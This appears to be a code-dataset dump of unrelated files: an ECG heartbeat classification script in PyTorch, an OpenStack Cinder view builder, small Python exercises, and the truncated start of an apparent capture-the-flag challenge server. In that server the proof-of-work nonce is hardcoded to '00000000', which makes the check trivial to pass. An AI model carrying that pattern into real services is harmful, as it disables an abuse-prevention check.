Models\n\n\nclass Swish(nn.Module):\n def forward(self, x):\n return x * torch.sigmoid(x)\n\n\nclass ConvNormPool(nn.Module):\n \"\"\"Conv Skip-connection module\"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n kernel_size,\n norm_type='bachnorm'\n ):\n super().__init__()\n\n self.kernel_size = kernel_size\n self.conv_1 = nn.Conv1d(\n in_channels=input_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.conv_2 = nn.Conv1d(\n in_channels=hidden_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.conv_3 = nn.Conv1d(\n in_channels=hidden_size,\n out_channels=hidden_size,\n kernel_size=kernel_size\n )\n self.swish_1 = Swish()\n self.swish_2 = Swish()\n self.swish_3 = Swish()\n if norm_type == 'group':\n self.normalization_1 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n self.normalization_2 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n self.normalization_3 = nn.GroupNorm(\n num_groups=8,\n num_channels=hidden_size\n )\n else:\n self.normalization_1 = nn.BatchNorm1d(num_features=hidden_size)\n self.normalization_2 = nn.BatchNorm1d(num_features=hidden_size)\n self.normalization_3 = nn.BatchNorm1d(num_features=hidden_size)\n\n self.pool = nn.MaxPool1d(kernel_size=2)\n\n def forward(self, input):\n conv1 = self.conv_1(input)\n x = self.normalization_1(conv1)\n x = self.swish_1(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n x = self.conv_2(x)\n x = self.normalization_2(x)\n x = self.swish_2(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n conv3 = self.conv_3(x)\n x = self.normalization_3(conv1 + conv3)\n x = self.swish_3(x)\n x = F.pad(x, pad=(self.kernel_size - 1, 0))\n\n x = self.pool(x)\n return x\n\n\nclass CNN(nn.Module):\n def __init__(\n self,\n input_size=1,\n hid_size=256,\n kernel_size=5,\n num_classes=5,\n ):\n super().__init__()\n\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size // 2,\n kernel_size=kernel_size,\n )\n self.conv3 = ConvNormPool(\n input_size=hid_size // 2,\n hidden_size=hid_size // 4,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveAvgPool1d((1))\n self.fc = nn.Linear(in_features=hid_size // 4, out_features=num_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.avgpool(x)\n # print(x.shape) # num_features * num_channels\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=1)\n return x\n\n\nclass RNN(nn.Module):\n \"\"\"RNN module(cell type lstm or gru)\"\"\"\n\n def __init__(\n self,\n input_size,\n hid_size,\n num_rnn_layers=1,\n dropout_p=0.2,\n bidirectional=False,\n rnn_type='lstm',\n ):\n super().__init__()\n\n if rnn_type == 'lstm':\n self.rnn_layer = nn.LSTM(\n input_size=input_size,\n hidden_size=hid_size,\n num_layers=num_rnn_layers,\n dropout=dropout_p if num_rnn_layers > 1 else 0,\n bidirectional=bidirectional,\n batch_first=True,\n )\n\n else:\n self.rnn_layer = nn.GRU(\n input_size=input_size,\n hidden_size=hid_size,\n num_layers=num_rnn_layers,\n dropout=dropout_p if num_rnn_layers > 1 else 0,\n bidirectional=bidirectional,\n batch_first=True,\n )\n\n def forward(self, input):\n outputs, hidden_states = self.rnn_layer(input)\n return outputs, hidden_states\n\n\nclass RNNModel(nn.Module):\n def __init__(\n self,\n input_size,\n hid_size,\n rnn_type,\n bidirectional,\n n_classes=5,\n kernel_size=5,\n ):\n super().__init__()\n\n self.rnn_layer = RNN(\n input_size=46, # hid_size * 2 if bidirectional else hid_size,\n hid_size=hid_size,\n rnn_type=rnn_type,\n bidirectional=bidirectional\n )\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveAvgPool1d((1))\n self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x, _ = self.rnn_layer(x)\n x = self.avgpool(x)\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=1) # .squeeze(1)\n return x\n\n\nclass RNNAttentionModel(nn.Module):\n def __init__(\n self,\n input_size,\n hid_size,\n rnn_type,\n bidirectional,\n n_classes=5,\n kernel_size=5,\n ):\n super().__init__()\n\n self.rnn_layer = RNN(\n input_size=46,\n hid_size=hid_size,\n rnn_type=rnn_type,\n bidirectional=bidirectional\n )\n self.conv1 = ConvNormPool(\n input_size=input_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.conv2 = ConvNormPool(\n input_size=hid_size,\n hidden_size=hid_size,\n kernel_size=kernel_size,\n )\n self.avgpool = nn.AdaptiveMaxPool1d((1))\n self.attn = nn.Linear(hid_size, hid_size, bias=False)\n self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)\n\n def forward(self, input):\n x = self.conv1(input)\n x = self.conv2(x)\n x_out, hid_states = self.rnn_layer(x)\n x = torch.cat([hid_states[0], hid_states[1]], dim=0).transpose(0, 1)\n x_attn = torch.tanh(self.attn(x))\n x = x_attn.bmm(x_out)\n x = x.transpose(2, 1)\n x = self.avgpool(x)\n x = x.view(-1, x.size(1) * x.size(2))\n x = F.softmax(self.fc(x), dim=-1)\n return x\n\n\n# # Training Stage\n\nclass Meter:\n def __init__(self, n_classes=5):\n self.metrics = {}\n self.confusion = torch.zeros((n_classes, n_classes))\n\n def update(self, x, y, loss):\n x = np.argmax(x.detach().cpu().numpy(), axis=1)\n y = y.detach().cpu().numpy()\n self.metrics['loss'] += loss\n self.metrics['accuracy'] += accuracy_score(x, y)\n self.metrics['f1'] += f1_score(x, y, average='macro')\n self.metrics['precision'] += precision_score(x, y, average='macro', zero_division=1)\n self.metrics['recall'] += recall_score(x, y, average='macro', zero_division=1)\n\n self._compute_cm(x, y)\n\n def _compute_cm(self, x, y):\n for prob, target in zip(x, y):\n if prob == target:\n self.confusion[target][target] += 1\n else:\n self.confusion[target][prob] += 1\n\n def init_metrics(self):\n self.metrics['loss'] = 0\n self.metrics['accuracy'] = 0\n self.metrics['f1'] = 0\n self.metrics['precision'] = 0\n self.metrics['recall'] = 0\n\n def get_metrics(self):\n return self.metrics\n\n def get_confusion_matrix(self):\n return self.confusion\n\n\nclass Trainer:\n def __init__(self, net, lr, batch_size, num_epochs):\n self.net = net.to(config.device)\n self.num_epochs = num_epochs\n self.criterion = nn.CrossEntropyLoss()\n self.optimizer = AdamW(self.net.parameters(), lr=lr)\n self.scheduler = CosineAnnealingLR(self.optimizer, T_max=num_epochs, eta_min=5e-6)\n self.best_loss = float('inf')\n self.phases = ['train', 'val']\n self.dataloaders = {\n phase: get_dataloader(phase, batch_size) for phase in self.phases\n }\n self.train_df_logs = pd.DataFrame()\n self.val_df_logs = pd.DataFrame()\n\n def _train_epoch(self, phase):\n print(f\"{phase} mode | time: {time.strftime('%H:%M:%S')}\")\n\n self.net.train() if phase == 'train' else self.net.eval()\n meter = Meter()\n meter.init_metrics()\n\n for i, (data, target) in enumerate(self.dataloaders[phase]):\n data = data.to(config.device)\n target = target.to(config.device)\n\n output = self.net(data)\n loss = self.criterion(output, target)\n\n if phase == 'train':\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n meter.update(output, target, loss.item())\n\n metrics = meter.get_metrics()\n metrics = {k: v / i for k, v in metrics.items()}\n df_logs = pd.DataFrame([metrics])\n confusion_matrix = meter.get_confusion_matrix()\n\n if phase == 'train':\n self.train_df_logs = pd.concat([self.train_df_logs, df_logs], axis=0)\n else:\n self.val_df_logs = pd.concat([self.val_df_logs, df_logs], axis=0)\n\n # show logs\n print('{}: {}, {}: {}, {}: {}, {}: {}, {}: {}'\n .format(*(x for kv in metrics.items() for x in kv))\n )\n fig, ax = plt.subplots(figsize=(5, 5))\n cm_ = ax.imshow(confusion_matrix, cmap='hot')\n ax.set_title('Confusion matrix', fontsize=15)\n ax.set_xlabel('Actual', fontsize=13)\n ax.set_ylabel('Predicted', fontsize=13)\n plt.colorbar(cm_)\n plt.show()\n\n return loss\n\n def run(self):\n for epoch in range(self.num_epochs):\n self._train_epoch(phase='train')\n with torch.no_grad():\n val_loss = self._train_epoch(phase='val')\n self.scheduler.step()\n\n if val_loss < self.best_loss:\n self.best_loss = val_loss\n print('\\nNew checkpoint\\n')\n self.best_loss = val_loss\n torch.save(self.net.state_dict(), f\"best_model_epoc{epoch}.pth\")\n # clear_output()\n\n\ndef make_test_stage(dataloader, model, probs=False):\n cls_predictions = []\n cls_ground_truths = []\n\n for i, (data, cls_target) in enumerate(dataloader):\n with torch.no_grad():\n\n data = data.to(config.device)\n cls_target = cls_target.cpu()\n cls_prediction = model(data)\n\n if not probs:\n cls_prediction = torch.argmax(cls_prediction, dim=1)\n\n cls_predictions.append(cls_prediction.detach().cpu())\n cls_ground_truths.append(cls_target)\n\n predictions_cls = torch.cat(cls_predictions).numpy()\n ground_truths_cls = torch.cat(cls_ground_truths).numpy()\n return predictions_cls, ground_truths_cls\n\n\nif __name__=='__main__':\n config = Config()\n seed_everything(config.seed)\n\n df_ptbdb = pd.read_csv('input/heartbeat/ptbdb_abnormal.csv')\n df_mitbih = pd.read_csv('input/heartbeat/mitbih_train.csv')\n df_ptbdb\n\n df_mitbih_train = pd.read_csv('input/heartbeat/mitbih_train.csv', header=None)\n df_mitbih_test = pd.read_csv('input/heartbeat/mitbih_test.csv', header=None)\n df_mitbih = pd.concat([df_mitbih_train, df_mitbih_test], axis=0)\n df_mitbih.rename(columns={187: 'class'}, inplace=True)\n\n id_to_label = {\n 0: \"Normal\",\n 1: \"Artial Premature\",\n 2: \"Premature ventricular contraction\",\n 3: \"Fusion of ventricular and normal\",\n 4: \"Fusion of paced and normal\"\n }\n df_mitbih['label'] = df_mitbih.iloc[:, -1].map(id_to_label)\n print(df_mitbih.info())\n\n # In[ ]:\n\n df_mitbih.to_csv('data.csv', index=False)\n config.csv_path = 'data.csv'\n\n # # Basic EDA\n\n # In[ ]:\n\n df_mitbih = pd.read_csv(config.csv_path)\n df_mitbih['label'].value_counts()\n\n # In[ ]:\n\n percentages = [count / df_mitbih.shape[0] * 100 for count in df_mitbih['label'].value_counts()]\n\n fig, ax = plt.subplots(figsize=(12, 6))\n sns.countplot(\n x=df_mitbih['label'],\n ax=ax,\n palette=\"bright\",\n order=df_mitbih['label'].value_counts().index\n )\n ax.set_xticklabels(ax.get_xticklabels(), rotation=15);\n\n for percentage, count, p in zip(\n percentages,\n df_mitbih['label'].value_counts(sort=True).values,\n ax.patches):\n percentage = f'{np.round(percentage, 2)}%'\n x = p.get_x() + p.get_width() / 2 - 0.4\n y = p.get_y() + p.get_height()\n ax.annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=12, fontweight='bold')\n\n plt.savefig('data_dist.png', facecolor='w', edgecolor='w', format='png',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n plt.savefig('data_dist.svg', facecolor='w', edgecolor='w', format='svg',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n\n # I used the GAN from the notebook you can find [here](https://www.kaggle.com/polomarco/1d-gan-for-ecg-synthesis) or a repository with the code [here](https://github.com/mandrakedrink/ECG-Synthesis-and-Classification) to generate new synthetic data for classes with little data, now the dataset looks like this:\n\n # In[ ]:\n\n config.csv_path = 'input/mitbih-with-synthetic/mitbih_with_syntetic.csv'\n df_mitbih_new = pd.read_csv(config.csv_path)\n percentages1 = [count / df_mitbih.shape[0] * 100 for count in df_mitbih['label'].value_counts()]\n percentages2 = [count / df_mitbih_new.shape[0] * 100 for count in df_mitbih_new['label'].value_counts()]\n\n fig, axs = plt.subplots(1, 2, figsize=(18, 4))\n\n # origin\n sns.countplot(\n x=df_mitbih['label'],\n ax=axs[0],\n palette=\"bright\",\n order=df_mitbih['label'].value_counts().index\n )\n axs[0].set_xticklabels(axs[0].get_xticklabels(), rotation=15);\n axs[0].set_title(\"Before\", fontsize=15)\n\n for percentage, count, p in zip(\n percentages1,\n df_mitbih['label'].value_counts(sort=True).values,\n axs[0].patches):\n percentage = f'{np.round(percentage, 2)}%'\n x = p.get_x() + p.get_width() / 2 - 0.4\n y = p.get_y() + p.get_height()\n axs[0].annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=10, fontweight='bold')\n\n # with synthetic\n sns.countplot(\n x=df_mitbih_new['label'],\n ax=axs[1],\n palette=\"bright\",\n order=df_mitbih_new['label'].value_counts().index\n )\n axs[1].set_xticklabels(axs[1].get_xticklabels(), rotation=15);\n axs[1].set_title(\"After\", fontsize=15)\n\n for percentage, count, p in zip(\n percentages2,\n df_mitbih_new['label'].value_counts(sort=True).values,\n axs[1].patches):\n percentage = f'{np.round(percentage, 2)}%'\n x = p.get_x() + p.get_width() / 2 - 0.4\n y = p.get_y() + p.get_height()\n axs[1].annotate(str(percentage) + \" / \" + str(count), (x, y), fontsize=10, fontweight='bold')\n\n # plt.suptitle(\"Balanced Sampling between classes\", fontsize=20, weight=\"bold\", y=1.01)\n plt.savefig('data_dist.png', facecolor='w', edgecolor='w', format='png',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n plt.savefig('data_dist.svg', facecolor='w', edgecolor='w', format='svg',\n transparent=False, bbox_inches='tight', pad_inches=0.1)\n\n # In[ ]:\n\n N = 5\n samples = [df_mitbih.loc[df_mitbih['class'] == cls].sample(N) for cls in range(N)]\n titles = [id_to_label[cls] for cls in range(5)]\n\n with plt.style.context(\"seaborn-white\"):\n fig, axs = plt.subplots(3, 2, figsize=(20, 7))\n for i in range(5):\n ax = axs.flat[i]\n ax.plot(samples[i].values[:, :-2].transpose())\n ax.set_title(titles[i])\n # plt.ylabel(\"Amplitude\")\n\n plt.tight_layout()\n plt.suptitle(\"ECG Signals\", fontsize=20, y=1.05, weight=\"bold\")\n plt.savefig(f\"signals_per_class.svg\",\n format=\"svg\", bbox_inches='tight', pad_inches=0.2)\n\n plt.savefig(f\"signals_per_class.png\",\n format=\"png\", bbox_inches='tight', pad_inches=0.2)\n\n # get_ipython().run_cell_magic('time', '', \"signals = [' '.join(df_mitbih.iloc[i, :-1].apply(str).values) for i in range(df_mitbih.shape[0])]\\ny = df_mitbih.iloc[:, -1].values.tolist()\\nprint(len(signals), len(y))\\n\\nprint(f'data has {len(set([sig for line in signals for sig in line.split()]))} out of 16 372 411 unique values.')\")\n\n # Dataset and DataLoader\n x = torch.linspace(-10.0, 10.0, 100)\n swish = Swish()\n swish_out = swish(x)\n relu_out = torch.relu(x)\n\n plt.title('Swish function')\n plt.plot(x.numpy(), swish_out.numpy(), label='Swish')\n plt.plot(x.numpy(), relu_out.numpy(), label='ReLU')\n plt.legend();\n plt.show()\n\n # model = RNNAttentionModel(1, 64, 'lstm', False)\n # model = RNNModel(1, 64, 'lstm', True)\n model = CNN(num_classes=5, hid_size=128)\n #train model?\n trainer = Trainer(net=model, lr=1e-3, batch_size=96, num_epochs=10) # 100)\n trainer.run()\n\n train_logs = trainer.train_df_logs\n train_logs.columns = [\"train_\" + colname for colname in train_logs.columns]\n val_logs = trainer.val_df_logs\n val_logs.columns = [\"val_\" + colname for colname in val_logs.columns]\n\n logs = pd.concat([train_logs, val_logs], axis=1)\n logs.reset_index(drop=True, inplace=True)\n logs = logs.loc[:, [\n 'train_loss', 'val_loss',\n 'train_accuracy', 'val_accuracy',\n 'train_f1', 'val_f1',\n 'train_precision', 'val_precision',\n 'train_recall', 'val_recall']\n ]\n logs.head()\n logs.to_csv('cnn.csv', index=False)\n\n # # Experiments and Results\n\n cnn_model = CNN(num_classes=5, hid_size=128).to(config.device)\n cnn_model.load_state_dict(\n torch.load(config.cnn_state_path,\n map_location=config.device)\n );\n cnn_model.eval();\n logs = pd.read_csv(config.cnn_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN Model', fontsize=18)\n\n plt.tight_layout()\n fig.savefig(\"cnn.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"cnn.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n\n lstm_model = RNNModel(1, 64, 'lstm', True).to(config.device)\n lstm_model.load_state_dict(\n torch.load(config.lstm_state_path,\n map_location=config.device)\n );\n lstm_model.eval();\n logs = pd.read_csv(config.lstm_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN+LSTM Model', fontsize=18)\n\n plt.tight_layout()\n fig.savefig(\"lstm.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"lstm.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n attn_model = RNNAttentionModel(1, 64, 'lstm', False).to(config.device)\n attn_model.load_state_dict(\n torch.load(config.attn_state_path,\n map_location=config.device)\n );\n attn_model.eval();\n logs = pd.read_csv(config.attn_logs)\n\n colors = ['#C042FF', '#03C576FF', '#FF355A', '#03C5BF', '#96C503', '#C5035B']\n palettes = [sns.color_palette(colors, 2),\n sns.color_palette(colors, 4),\n sns.color_palette(colors[:2] + colors[-2:] + colors[2:-2], 6)]\n\n fig, ax = plt.subplots(1, 2, figsize=(12, 4))\n\n sns.lineplot(data=logs.iloc[:, :2], palette=palettes[0], markers=True, ax=ax[0], linewidth=2.5, )\n ax[0].set_title(\"Loss Function during Model Training\", fontsize=14)\n ax[0].set_xlabel(\"Epoch\", fontsize=14)\n\n sns.lineplot(data=logs.iloc[:, 2:6], palette=palettes[1], markers=True, ax=ax[1], linewidth=2.5, legend=\"full\")\n ax[1].set_title(\"Metrics during Model Training\", fontsize=15)\n ax[1].set_xlabel(\"Epoch\", fontsize=14)\n\n plt.suptitle('CNN+LSTM+Attention Model', fontsize=18)\n\n plt.tight_layout()\n fig.savefig(\"attn.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"attn.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n\n # ## Experiments and Results for Test Stage\n\n test_df = pd.read_csv(config.test_csv_path)\n print(test_df.shape)\n test_dataset = ECGDataset(test_df)\n test_dataloader = DataLoader(dataset=test_dataset, batch_size=96, num_workers=0, shuffle=False)\n\n models = [cnn_model, lstm_model, attn_model]\n\n # ### cnn model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[0])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", \"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"cnn_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"cnn_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### cnn+lstm model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[1])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", \"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN+LSTM Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"lstm_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"lstm_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### cnn+lstm+attention model report\n\n y_pred, y_true = make_test_stage(test_dataloader, models[2])\n y_pred.shape, y_true.shape\n\n report = pd.DataFrame(\n classification_report(\n y_pred,\n y_true,\n output_dict=True\n )\n ).transpose()\n\n colors = ['#00FA9A', '#D2B48C', '#FF69B4'] # random.choices(list(mcolors.CSS4_COLORS.values()), k = 3)\n report_plot = report.apply(lambda x: x * 100)\n ax = report_plot[[\"precision\", \"recall\", \"f1-score\"]].plot(kind='bar',\n figsize=(13, 4), legend=True, fontsize=15, color=colors)\n\n ax.set_xlabel(\"Estimators\", fontsize=15)\n ax.set_xticklabels(\n list(id_to_label.values()) + [\"accuracy avg\", \"marco avg\", \"weighted avg\"],\n rotation=15, fontsize=11)\n ax.set_ylabel(\"Percentage\", fontsize=15)\n plt.title(\"CNN+LSTM+Attention Model Classification Report\", fontsize=20)\n\n for percentage, p in zip(\n report[['precision', 'recall', 'f1-score']].values,\n ax.patches):\n percentage = \" \".join([str(round(i * 100, 2)) + \"%\" for i in percentage])\n x = p.get_x() + p.get_width() - 0.4\n y = p.get_y() + p.get_height() / 4\n ax.annotate(percentage, (x, y), fontsize=8, rotation=15, fontweight='bold')\n fig.savefig(\"attn_report.png\", format=\"png\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n fig.savefig(\"attn_report.svg\", format=\"svg\", pad_inches=0.2, transparent=False, bbox_inches='tight')\n plt.show()\n\n # ### Ensemble of all models\n\n y_pred = np.zeros((y_pred.shape[0], 5), dtype=np.float32)\n for i, model in enumerate(models, 1):\n y_pred_, y_true = make_test_stage(test_dataloader, model, True)\n y_pred += y_pred_\n y_pred /= i\n y_pred = np.argmax(y_pred, axis=1)\n\n clf_report = classification_report(y_pred,\n y_true,\n labels=[0, 1, 2, 3, 4],\n target_names=list(id_to_label.values()), # ['N', 'S', 'V', 'F', 'Q'],\n output_dict=True)\n\n plt.figure(figsize=(10, 8))\n ax = sns.heatmap(pd.DataFrame(clf_report).iloc[:-1, :].T, annot=True)\n ax.set_xticklabels(ax.get_xticklabels(), fontsize=15)\n ax.set_yticklabels(ax.get_yticklabels(), fontsize=12, rotation=0)\n plt.title(\"Ensemble Classification Report\", fontsize=20)\n plt.savefig(f\"ensemble result.svg\", format=\"svg\", bbox_inches='tight', pad_inches=0.2)\n plt.savefig(f\"ensemble result.png\", format=\"png\", bbox_inches='tight', pad_inches=0.2)\n clf_report\n","repo_name":"kuai364354200/ECG","sub_path":"ecg-classification-cnn-lstm-attention-mec-5ae284.py","file_name":"ecg-classification-cnn-lstm-attention-mec-5ae284.py","file_ext":"py","file_size_in_byte":31273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9579966005","text":"from cinder.api import microversions as mv\nfrom cinder.api.views import backups as views_v2\nfrom cinder.common import constants as cinder_constants\n\n\nclass ViewBuilder(views_v2.ViewBuilder):\n \"\"\"Model a backups API V3 response as a python dictionary.\"\"\"\n\n def detail(self, request, backup):\n \"\"\"Detailed view of a single backup.\"\"\"\n backup_ref = super(ViewBuilder, self).detail(request, backup)\n\n # Add metadata if min version is greater than or equal to\n # BACKUP_METADATA.\n req_version = request.api_version_request\n if req_version.matches(mv.BACKUP_METADATA):\n backup_ref['backup']['metadata'] = backup.metadata\n\n if req_version.matches(mv.ENCRYPTION_KEY_ID_IN_DETAILS, None):\n encryption_key_id = backup.get('encryption_key_id', None)\n if (encryption_key_id and\n encryption_key_id != cinder_constants.FIXED_KEY_ID):\n backup_ref['backup']['encryption_key_id'] = encryption_key_id\n\n return backup_ref\n","repo_name":"openstack/cinder","sub_path":"cinder/api/v3/views/backups.py","file_name":"backups.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"66"} +{"seq_id":"18080131906","text":"'''\n4. 定义一个 Employee 雇员类,要求如下:\n(1) 属性有:id、name、salary\n(2) 运算符重载+:实现两个对象相加时,默认返回他们的薪水和\n(3) 构造方法要求:输入 name、salary,不输入 id。id 采用自增的方式,从 1000 开始自增,第一个新增对象是 1001,第二个新增对象是 1002。\n(4) 根据 salary 属性,使用@property 设置属性的 get 和 set 方法。set 方法要求输入:1000-50000 范围的数字。\n'''\n\nclass Employee:\n\n id = 1000\n \n def __init__(self,name,salary):\n self.name = name\n self.__salary = salary\n Employee.id += 1\n\n @property\n def salary(self):\n return self.__salary\n \n @salary.setter\n def setsalary(self,salary):\n if 1000 Optional[ListNode]:\n \"\"\"\n 그냥 계산해서 새로운 리스트를 생성\n \"\"\"\n s1, s2 = 0, 0\n p1, p2 = l1, l2\n while p1:\n s1 = s1* 10 + p1.val\n p1 = p1.next\n while p2:\n s2 = s2* 10 + p2.val\n p2 = p2.next\n p = head = ListNode()\n for c in str(s1+s2):\n p.next = ListNode(int(c))\n p = p.next\n return head.next\n \n \n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n def expandListFront(node: ListNode, length: int, val: int) -> ListNode:\n for _ in range(length):\n temp = ListNode(val)\n temp.next = node\n node = temp\n return node\n\n # Carry를 리턴하고, cur1 링크드리스트에 결과값을 추가.\n def addCurrentNode(cur1: ListNode, cur2: ListNode) -> int:\n carry = 0\n if cur1.next and cur2.next:\n carry = addCurrentNode(cur1.next, cur2.next)\n s = cur1.val + cur2.val + carry\n cur1.val = s % 10\n return s // 10\n\n n1, cur1, n2, cur2 = 0, l1, 0, l2\n while cur1:\n cur1, n1 = cur1.next, n1 + 1\n while cur2:\n cur2, n2 = cur2.next, n2 + 1\n if n1 < n2:\n l1 = expandListFront(l1, n2 - n1, 0)\n else:\n l2 = expandListFront(l2, n1 - n2, 0)\n\n carry = addCurrentNode(l1, l2)\n if carry == 1:\n l1 = expandListFront(l1, 1, 1)\n return l1\n","repo_name":"hanwgyu/algorithm_problem_solving","sub_path":"Leetcode/Add_Two_Numbers_II.py","file_name":"Add_Two_Numbers_II.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70498149331","text":"#!/usr/bin/env python3\nfrom os import urandom\nfrom random import choices\nfrom hashlib import sha256\nimport signal\nimport string\nimport sys\n\n# from flag import FLAG\n\n\ndef getrandbits(bit):\n return int.from_bytes(urandom(bit >> 3), \"big\")\n\n\ndef proof_of_work() -> bool:\n alphabet = string.ascii_letters + string.digits\n nonce = \"\".join(choices(alphabet, k=8))\n nonce = '00000000' \n print(f'SHA256(\"{nonce}\" + ?) starts with \"00000\"')\n suffix = input().strip()\n message = (nonce + suffix).encode(\"Latin-1\")\n return sha256(message).digest().hex().startswith(\"00000\")\n\n\ndef main():\n # signal.alarm(60)\n # if not 